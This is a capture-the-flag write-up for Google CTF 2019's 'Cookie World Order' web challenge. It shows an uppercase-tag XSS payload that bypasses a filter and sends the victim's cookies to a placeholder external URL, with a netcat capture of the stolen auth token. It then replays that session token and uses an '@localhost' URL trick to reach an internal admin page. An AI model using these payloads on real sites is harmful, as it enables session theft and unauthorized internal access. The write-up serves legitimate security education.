Rating:

## Write-up: **Cookie World Order**

Google CTF 2019: [Beginner’s Quest](https://capturetheflag.withgoogle.com/#beginners/)

![Task](img/task.jpg)

This is a `web` challenge that involves an XSS attack: <https://cwo-xss.web.ctfcompetition.com>

We are presented a chat widget and we can chat as user “brewtoot” with user “Admin”. There appears to be a word filter in place, since `<script>` outputs the message “HACKER ALERT!”.

![Chat](img/chat.jpg)

`<SCRIPT>` on the other hand works. Our goal is to have the other person disclose their browser cookie. This line is sufficient:

```html
<SCRIPT>new Image().src="https://PUBLIC_URL/"+document.cookie</SCRIPT>
````

Note that there will be two incoming requests, one from ourselves and one from the victim. [PostBin](https://postb.in) is a great tool for this, but netcat also works if timed correctly:

```
$ nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from localhost 46010 received!
GET /?flag=CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r};%20auth=TUtb9PPA9cYkfcVQWYzxy4XbtyL3VNKz HTTP/1.1
## ...
Referer: https://cwo-xss.web.ctfcompetition.com/exploit?reflect=%3CSCRIPT%3Enew%20Image().src=%22http://PUBLIC_URL/%22+document.cookie%3C/SCRIPT%3E
## ...
```

**Flag 1**: `CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}`

## Flag 2

In addition to the flag, the cookie also contains an `auth` token which we can use to find the second flag.

First, we observe that there is a hidden page at https://cwo-xss.web.ctfcompetition.com/admin, which redirects to the start page. The [Government Agriculture Network](https://github.com/weibell/ctf-google2019-beginners/tree/master/write-up#day3-easier) challenge is very similar in this regard.

```
GET /admin HTTP/1.1
Host: cwo-xss.web.ctfcompetition.com

```

```
HTTP/1.1 302 FOUND
Date: Sun, 23 Jun 2019 11:50:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 209
Server: gunicorn/19.9.0
Location: http://cwo-xss.web.ctfcompetition.com/
Via: 1.1 google

<title>Redirecting...</title>
<h1>Redirecting...</h1>

You should be redirected automatically to target URL: /. If not click the link.
```

And this is when we make the same request with the `auth` token set:

```
GET /admin HTTP/1.1
Host: cwo-xss.web.ctfcompetition.com
Cookie: auth=TUtb9PPA9cYkfcVQWYzxy4XbtyL3VNKz

```

```
HTTP/1.1 200 OK
Date: Sun, 23 Jun 2019 11:51:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1115
Vary: Accept-Encoding
Server: gunicorn/19.9.0
Via: 1.1 google

<html lang="en">
<head>
<meta charset="UTF-8">
<title>CWO Network</title>
<link rel="stylesheet" href="/static/css/main.css">
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
<script src="/static/js/main.js"></script>
<script src="/static/js/admin.js"></script>
</head>
<body>
<div class="top-bar">
<div class="top-bar-container">
<div class="top-bar-logo">
CWO
</div>
</div>
</div>
<div class="admin-side-nav">

<div class="admin-side-item">
Users
</div>


<div class="admin-side-item">
Livestreams
</div>


<div class="admin-side-item">
Camera Controls
</div>

</div>
<div class="admin-container">
<div class="admin-message">

</div>
</div>
</body>
</html>
```

Unfortunately, we cannot access <https://cwo-xss.web.ctfcompetition.com/admin/controls> just yet:

```
GET /admin/controls HTTP/1.1
Host: cwo-xss.web.ctfcompetition.com

```

```
HTTP/1.1 403 FORBIDDEN
Date: Sun, 23 Jun 2019 11:55:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 37
Vary: Accept-Encoding
Server: gunicorn/19.9.0
Via: 1.1 google

Requests only accepted from 127.0.0.1
```

After some trial and error, we find that we can try to use `/watch?livestream=...` for a Local File Inclusion attack. However, it comes with a catch: `/watch?livestream=...` requires the file to begin with `http://cwo-xss.web.ctfcompetition.com`. We can use this trick as a workaround:

```
GET /watch?livestream=http://cwo-xss.web.ctfcompetition.com@postb.in/b/0123456789 HTTP/1.1
Host: cwo-xss.web.ctfcompetition.com

```

After confirming that this request goes through, we can finally grab the second flag, found at <http://cwo-xss.web.ctfcompetition.com/watch?livestream=http://[email protected]/admin/controls>:

```
GET /watch?livestream=http://cwo-xss.web.ctfcompetition.com@localhost/admin/controls HTTP/1.1
Host: cwo-xss.web.ctfcompetition.com

```

```
HTTP/1.1 200 OK
Date: Sun, 23 Jun 2019 11:57:55 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1529
Vary: Accept-Encoding
Server: gunicorn/19.9.0
Via: 1.1 google

<html lang="en">
<head>
<meta charset="UTF-8">
<title>CWO Network</title>
<link rel="stylesheet" href="/static/css/main.css">
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
<script src="/static/js/main.js"></script>
<script src="/static/js/admin.js"></script>
</head>
<body>
<div class="top-bar">
<div class="top-bar-container">
<div class="top-bar-logo">
CWO
</div>
</div>
</div>
<div class="admin-wrapper">
<div class="admin-side-nav">

<div class="admin-side-item">
Users
</div>


<div class="admin-side-item">
Livestreams
</div>


<div class="admin-side-item">
Camera Controls
</div>

</div>
<div class="admin-container">
<div class="admin-message">
CTF{WhatIsThisCookieFriendSpaceBookPlusAllAccessRedPremiumThingLooksYummy}
</div>
<div class="controls-title">
Livestream Controls
</div>
<div class="livestream-video">
<video loop autoplay muted src="/watch?livestream=http://localhost//livestream/garden-livestream.webm" />
</div>
</div>
</div>
</body>
</html>

```

There it is, the second flag!

**Flag 2**: `CTF{WhatIsThisCookieFriendSpaceBookPlusAllAccessRedPremiumThingLooksYummy}`

Original writeup (https://github.com/weibell/ctf-google2019-beginners/tree/master/write-up/day5-easier).